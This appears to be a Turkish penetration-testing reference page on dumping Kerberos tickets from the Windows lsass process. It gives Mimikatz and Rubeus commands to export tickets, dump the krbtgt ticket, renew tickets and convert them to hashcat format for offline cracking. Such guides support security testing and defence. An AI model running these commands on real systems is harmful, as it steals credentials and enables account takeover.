Windows'ta biletler, güvenlik politikalarını yöneten lsass (Yerel Güvenlik Yetkilendirme Alt Sistemi Hizmeti) işlemi tarafından yönetilir ve depolanır. Bu biletleri çıkarmak için, lsass işlemiyle etkileşimde bulunmak gerekmektedir. Bir yönetici olmayan bir kullanıcı yalnızca kendi biletlerine erişebilirken, bir yönetici sistemdeki tüm biletleri çıkarabilme yetkisine sahiptir. Bu tür işlemler için Mimikatz ve Rubeus araçları yaygın olarak kullanılmaktadır ve her biri farklı komutlar ve işlevler sunmaktadır.

Mimikatz

Mimikatz, Windows güvenliğiyle etkileşimde bulunabilen çok yönlü bir araçtır. Sadece biletleri çıkarmakla kalmaz, aynı zamanda çeşitli diğer güvenlikle ilgili işlemler için de kullanılır.

# Extracting tickets using Mimikatz
sekurlsa::tickets /export

Rubeus

Rubeus, Kerberos etkileşimi ve manipülasyonu için özel olarak tasarlanmış bir araçtır. Bilet çıkarma ve işleme ile birlikte diğer Kerberos ile ilgili faaliyetler için kullanılır.

# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>

Bu komutları kullanırken, <BASE64_TICKET> ve <luid> gibi yer tutucuları gerçek Base64 kodlu bilet ve Giriş Kimliği ile değiştirmeyi unutmayın. Bu araçlar, biletleri yönetmek ve Windows'un güvenlik mekanizmalarıyla etkileşimde bulunmak için kapsamlı işlevsellik sağlar.

Referanslar

• https://www.tarlogic.com/en/blog/how-to-attack-kerberos/